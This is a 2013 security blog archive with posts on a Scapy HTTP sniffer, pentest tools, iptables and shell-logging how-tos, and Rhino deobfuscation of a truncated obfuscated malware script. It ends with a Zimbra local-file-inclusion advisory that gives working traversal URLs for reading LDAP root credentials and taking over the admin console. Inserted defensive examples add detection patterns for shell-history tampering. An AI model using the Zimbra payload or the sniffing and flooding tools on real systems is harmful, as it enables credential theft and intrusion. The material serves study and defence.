Dec 21, 2013

Simple HTTP Sniffing With Python Scapy

#!/usr/bin/env python3

from scapy.all import sniff, TCP, Raw

m_iface = "wlan0"
filter_message = "tcp port 80"   # BPF filter handed to sniff(); a bare "http" is not valid BPF syntax
count = 0

def pktTCP(pkt):
    """Print the raw payload of every TCP segment addressed to port 80."""
    global count
    if pkt.haslayer(TCP) and pkt.getlayer(TCP).dport == 80 and pkt.haslayer(Raw):
        count = count + 1
        print(pkt.getlayer(Raw).load)

# store=0 stops sniff() from keeping every captured packet in memory during a long run
sniff(iface=m_iface, filter=filter_message, prn=pktTCP, store=0)

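An added example (not part of the original post) that builds on the callback above: instead of dumping raw payloads, each segment is parsed as an HTTP request and requests that send HTTP Basic credentials in the clear are flagged, which is what a defender running this sniffer is usually looking for. The sample request, hostname and credentials are constructed placeholders.

```python
import base64
from typing import Optional
# Constructed sample request as it would arrive in pkt[Raw].load; host and
# credentials ("alice:hunter2") are placeholders.
SAMPLE_REQUEST = (
    b"GET /login?next=/ HTTP/1.1\r\n"
    b"Host: intranet.example\r\n"
    b"Authorization: Basic YWxpY2U6aHVudGVyMg==\r\n"
    b"User-Agent: curl/7.81.0\r\n\r\n"
)

def parse_http_request(payload: bytes) -> Optional[dict]:
    """Parse an HTTP/1.x request head; None if the segment is not a request start."""
    head, _, body = payload.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    parts = lines[0].split(b" ")
    if len(parts) != 3 or not parts[2].startswith(b"HTTP/"):
        return None  # e.g. a later segment of a large POST body, or not HTTP at all
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        if name:
            headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return {"method": parts[0].decode("latin-1"), "path": parts[1].decode("latin-1"),
            "headers": headers, "body": body}

def cleartext_credential_alert(payload: bytes) -> Optional[str]:
    """Alert string if the request carries HTTP Basic credentials in the clear
    (only the username is reported), otherwise None."""
    req = parse_http_request(payload)
    if req is None:
        return None
    auth = req["headers"].get("authorization", "")
    if not auth.lower().startswith("basic "):
        return None
    try:
        user = base64.b64decode(auth[6:]).split(b":", 1)[0].decode("latin-1")
    except ValueError:  # malformed base64
        user = "?"
    return "basic-auth user %r to %s%s" % (user, req["headers"].get("host", "?"), req["path"])

if __name__ == "__main__":
    from scapy.all import sniff, TCP, Raw  # imported here so the parser also runs without scapy
    def on_packet(pkt):
        if pkt.haslayer(TCP) and pkt[TCP].dport == 80 and pkt.haslayer(Raw):
            alert = cleartext_credential_alert(bytes(pkt[Raw].load))
            if alert:
                print(alert)
    sniff(iface="wlan0", filter="tcp port 80", prn=on_packet, store=0)
```

Each alert names a host that still authenticates over plain HTTP, which is the finding to act on; the password itself is never printed or stored.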

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Dec 20, 2013

Tools: Watcher - passive Web-security scanner

Watcher is a Fiddler addon which aims to assist penetration testers in passively finding Web-application vulnerabilities. The security field today has several good choices for HTTP proxies which assist auditors and pen-testers. We chose to implement this as a plugin for Fiddler which already provides the proxy framework for HTTP debugging. 

Source: http://websecuritytool.codeplex.com/




Dec 19, 2013

Exploit Repository

Repository name                          URL
Bugtraq SecurityFocus                    http://www.securityfocus.com
OSVDB Vulnerabilities                    http://osvdb.org
Packet Storm                             http://www.packetstormsecurity.org
VUPEN Security                           http://www.vupen.com
National Vulnerability Database          http://nvd.nist.gov
ISS X-Force                              http://xforce.iss.net
SecuriTeam                               http://www.securiteam.com
Government Security                      http://www.governmentsecurity.org
US-CERT Vulnerability Notes              http://www.kb.cert.org/vuls
BugReport                                http://www.bugreport.ir
Secunia                                  http://secunia.com/advisories/historic/
Offensive Security Exploits Database     http://www.exploit-db.com
Security Vulnerabilities Database        http://securityvulns.com

Source: http://resources.infosecinstitute.com/mechanics-metasploit/



Tools: macof - flood a switched LAN with random MAC addresses

macof floods the local network with random MAC addresses (causing some switches to fail open in repeating mode, facilitating sniffing). A straight C port of the original Perl Net::RawIP macof program by Ian Vitek <ian.vitek@infosec.se>.  


Source: http://www.irongeek.com/i.php?page=backtrack-3-man/macof


Dec 18, 2013

Tools: BTS PenTesting Lab

BTS PenTesting Lab is a vulnerable web application that helps you learn basic to advanced vulnerability types. The app is still in beta (v0.2).
Currently, the app lets you learn the following vulnerability types:
SQL Injection
XSS
CSRF
Clickjacking
SSRF
File Inclusion
Command Execution
I am trying to bring some advanced vulnerability types and advanced techniques. Hopefully, you can see them in the next update :)
The app is developed by Sabari Selvan, a security researcher at the Cyber Security Privacy Foundation (cysecurity.org).

Source: http://code.google.com/p/bts-pentesting-lab/




Dec 17, 2013

Howto: Monitor all shell commands and send them to a syslog server

1. auditctl -a exit,always -w /path/to/file
(logs go to /var/log/audit/audit.log)

2. Edit /etc/bashrc and modify or add to the end of the file:
PROMPT_COMMAND='history -a >(logger -t "$USER[$$] $SSH_CONNECTION")'

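An added example (not from the original post) of what to do with the lines the PROMPT_COMMAND above produces once they reach the syslog server: a parser for the "$USER[$$] $SSH_CONNECTION" tag format and a scan for commands that try to defeat the logging or change privileges. The log lines, hostnames and addresses are constructed.

```python
import re
from typing import Optional

# Constructed sample lines in the shape produced by the PROMPT_COMMAND above:
# the logger tag is "$USER[$$] $SSH_CONNECTION", followed by ": " and the command.
SAMPLE_LOG = """\
Dec 17 09:12:01 bastion alice[4021] 192.0.2.10 51234 198.51.100.5 22: ls -la /etc
Dec 17 09:12:09 bastion alice[4021] 192.0.2.10 51234 198.51.100.5 22: sudo -i
Dec 17 09:12:33 bastion root[4188] 192.0.2.10 51234 198.51.100.5 22: unset HISTFILE
Dec 17 09:12:40 bastion root[4188] 192.0.2.10 51234 198.51.100.5 22: history -c
Dec 17 09:13:02 bastion bob[4310] 203.0.113.7 40022 198.51.100.5 22: cat /var/log/syslog
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) "
    r"(?P<user>[^\s\[]+)\[(?P<pid>\d+)\]"
    r"(?: (?P<src>\S+) (?P<sport>\d+) (?P<dst>\S+) (?P<dport>\d+))?"  # absent for local (non-SSH) shells
    r" ?: (?P<cmd>.*)$")

# Patterns a reviewer of shell logs cares about: attempts to stop this very
# logging, and switches to another account.
SUSPICIOUS = {
    "history-tamper": re.compile(r"(history\s+-c|unset\s+HISTFILE|HISTFILE=|HISTSIZE=0|set\s+\+o\s+history)"),
    "priv-change": re.compile(r"^(sudo|su)\b"),
}

def parse_line(line: str) -> Optional[dict]:
    """Split one syslog line into its fields; None if it is not in our format."""
    m = LINE_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None

def find_alerts(log_text: str) -> list:
    """Return (category, user, src_ip, command) for every line matching a SUSPICIOUS pattern."""
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for category, pattern in SUSPICIOUS.items():
            if pattern.search(rec["cmd"]):
                alerts.append((category, rec["user"], rec["src"], rec["cmd"]))
    return alerts

if __name__ == "__main__":
    for alert in find_alerts(SAMPLE_LOG):
        print("%-15s %-6s %-12s %s" % alert)
```

A user can unset PROMPT_COMMAND in their own shell, so a session that suddenly stops producing lines is itself worth an alert; the kernel-side audit rule in step 1 is the part a user cannot switch off from the shell.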



Howto: Deny direct access to a port and allow only the forwarded port.

Users must connect to the SSH server on port 60050, even though the server (destination) has sshd bound to port 22.


# Mark traffic that arrives with destination port 22
iptables -t mangle -A PREROUTING -p tcp -m tcp --dport 22 -j MARK --set-mark 0x1
# Drop the marked traffic
iptables -A INPUT -m mark --mark 0x1 -j DROP

# Forward port 60050 to 22
iptables -t nat -A PREROUTING -i eth0 -p tcp -m tcp --dport 60050 -j REDIRECT --to-ports 22
iptables -A INPUT -p tcp -m tcp --dport 60050 -m state --state NEW -j ACCEPT
iptables -A INPUT -p tcp -m tcp --dport 22 -j ACCEPT

The mangle PREROUTING chain runs before the nat REDIRECT, so only connections that arrived with destination port 22 carry the mark and hit the DROP rule; connections to 60050 reach INPUT unmarked, with their destination port already rewritten to 22.

 



Howto: Automatically redirect outbound traffic from the original port to a custom port

# Generic form (target = destination host), then a concrete example
iptables -t nat -A OUTPUT -d target -p tcp -m tcp --dport 22 -j DNAT --to-destination target:65500
iptables -t nat -A OUTPUT -d 1.1.1.1 -p tcp -m tcp --dport 22 -j DNAT --to-destination 1.1.1.1:65500
 



Batch Script to Check Whether a Host Is Alive

Sample batch script

@setlocal enableextensions enabledelayedexpansion
@echo off
rem Usage: <script> <ip-address>  -- polls the host about once a second and reports link state changes
set ipaddr=%1
set oldstate=neither
:loop
set state=down
rem Tokens 5 and 7 of the "Packets: Sent = 1, Received = 1, Lost = 0" line are "Received" and "1,"
for /f "tokens=5,7" %%a in ('ping -n 1 !ipaddr!') do (
    if "x%%a"=="xReceived" if "x%%b"=="x1," set state=up
)
rem Report only when the state changes
if not !state!==!oldstate! (
    echo.Link is !state!
    set oldstate=!state!
)
rem Pinging localhost twice is a roughly one second delay without a sleep command
ping -n 2 127.0.0.1 >nul: 2>nul:
goto :loop
endlocal

 



Dec 16, 2013

Article: Anonymous with the i2p Protocol

I wrote this article after reading the news about the Russian malware called i2ninja. What is special about i2ninja is that it uses i2p to hide from detection, so I studied it and wrote this article. Enjoy :)

https://www.dropbox.com/s/fmc15kgdf5npp3x/Anonymous%20%E0%B8%94%E0%B9%89%E0%B8%A7%E0%B8%A2%20I2P.pdf



Tools: Wifitap - WLAN Traffic Injection Tool

"Wifitap is a proof of concept for communication over WLAN networks using traffic injection. Wifitap allows direct communication with a station associated to a given access point, whilst not being associated ourselves or being handled by the access point." -http://sid.rstack.org






Dec 15, 2013

Tools: Webshell Collection

Pentestmonkey's REVERSE php shell:
b374k-shell (PHP):
AJAX Shell:
Weevely Shell:
The fuzzdb backdoor collection:
The laudanum set of injectable code:
htshells by wireghoul:
a collection of malware type shells (use at own risk):



Source: http://www.securityaegis.com/web-shells-for-all/



Tools: Rhino - JavaScript Deobfuscation Tool

Rhino is an open-source implementation of JavaScript written entirely in Java. It is typically embedded into Java applications to provide scripting to end users, and it is embedded in J2SE 6 as the default Java scripting engine.
Rhino-debugger is a graphical user interface (GUI) for debugging JavaScript. It is convenient for malware analysts who need to deobfuscate JavaScript.

Installation
$ sudo aptitude install rhino

Usage
rhino-debugger script.js

Example
Let's deobfuscate an obfuscated JavaScript file:
$ cat /data/tmp/malwares/storm.js
function xor_str(plain_str, xor_key) {
    var xored_str = "";
    for (var i = 0; i < plain_str.length; ++i)
        xored_str += String.fromCharCode(xor_key ^ plain_str.charCodeAt(i));
    return xored_str;
}
var plain_str = "\x94\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe
[SNIP]
\xdb\xc3\x9c\x84\x9d\x8f\x94\xc9\xbe\xbe\xc9\xbe\xbe\xc7\xc0\xd5\xc6\xc0\x9c\x9d\x8f\xbe";
var xored_str = xor_str(plain_str, 180);
document.write(xored_str);

It's important to set line breaks where you will put your breakpoints, because breakpoints are applied to a given line.

Start Rhino JavaScript Debugger

Now, let's start the Rhino JavaScript Debugger:
$ rhino-debugger /data/tmp/malwares/storm.js &

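As an added example (not from the page or the aldeid wiki), a small Python script that recovers the xor_str() output statically, without executing the script in a debugger at all: it pulls plain_str and the numeric key out of the source and applies the XOR itself. The sample script is constructed with the same layout as storm.js and a harmless payload, since the real decoded content is not shown on the page.

```python
import re
from typing import Optional

def js_string_to_bytes(literal: str) -> bytes:
    """Turn the body of a JS string literal into bytes. storm.js only uses
    \\xNN escapes, so that is the only escape form handled here."""
    decoded = re.sub(r"\\x([0-9a-fA-F]{2})",
                     lambda m: chr(int(m.group(1), 16)), literal)
    return decoded.encode("latin-1")

def static_xor_deobfuscate(js_source: str) -> Optional[bytes]:
    """Recover the string xor_str() would produce, without running the script:
    locate plain_str and the numeric key passed in the call to xor_str()."""
    m_str = re.search(r'var\s+plain_str\s*=\s*"((?:[^"\\]|\\.)*)"\s*;', js_source, re.S)
    m_key = re.search(r'xor_str\s*\(\s*plain_str\s*,\s*(\d+)\s*\)', js_source)
    if not (m_str and m_key):
        return None
    key = int(m_key.group(1)) & 0xFF          # String.fromCharCode(k ^ c) with k < 256
    return bytes(b ^ key for b in js_string_to_bytes(m_str.group(1)))

# Constructed sample with the same layout as storm.js but a harmless payload;
# key 180 as in storm.js.
PLAINTEXT = b'<div id="placeholder">decoded sample text</div>'
XOR_KEY = 180

def build_sample(plain: bytes, key: int) -> str:
    escaped = "".join("\\x%02x" % (b ^ key) for b in plain)
    return ('function xor_str(plain_str, xor_key){ var xored_str = "";\n'
            'for (var i = 0 ; i < plain_str.length; ++i) '
            'xored_str += String.fromCharCode(xor_key ^ plain_str.charCodeAt(i));\n'
            ' return xored_str; } var plain_str = "%s";\n'
            'var xored_str = xor_str(plain_str, %d);\n'
            'document.write(xored_str);\n' % (escaped, key))

SAMPLE_JS = build_sample(PLAINTEXT, XOR_KEY)

if __name__ == "__main__":
    print(static_xor_deobfuscate(SAMPLE_JS).decode("latin-1"))
```

The first two escapes shown on the page, \x94 and \xbe, XOR with 180 to a space and a newline, which is consistent with the decoded output starting with whitespace.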
 


Source: http://www.aldeid.com/wiki/Rhino



Tools: Zimbra 0day exploit / Privilege escalation via LFI

# Exploit Title: Zimbra 0day exploit / Privilege escalation via LFI
# Date: 06 Dec 2013
# Exploit Author: rubina119
# Contact Email : rubina119[at]gmail.com
# Vendor Homepage: http://www.zimbra.com/
# Version: 2009, 2010, 2011, 2012 and early 2013 versions are affected,
# Tested on: Centos(x), Ubuntu.
# CVE : No CVE, no patch just 0Day
# State : Critical

# Mirror: http://www.exploit-db.com/sploits/zimbraexploit_rubina119.zip

---------------Description-----------------

This script exploits a Local File Inclusion in
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz
which allows us to see localconfig.xml, which contains LDAP root credentials,
which allow us to make requests to the /service/admin/soap API with the stolen
LDAP credentials to create a user with administration privileges and gain
access to the Administration Console.

LFI is located at:
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml

Example :

https://mail.example.com/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml

or

https://mail.example.com:7071/zimbraAdmin/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml

  


Source: http://cxsecurity.com/issue/WLB-2013120097

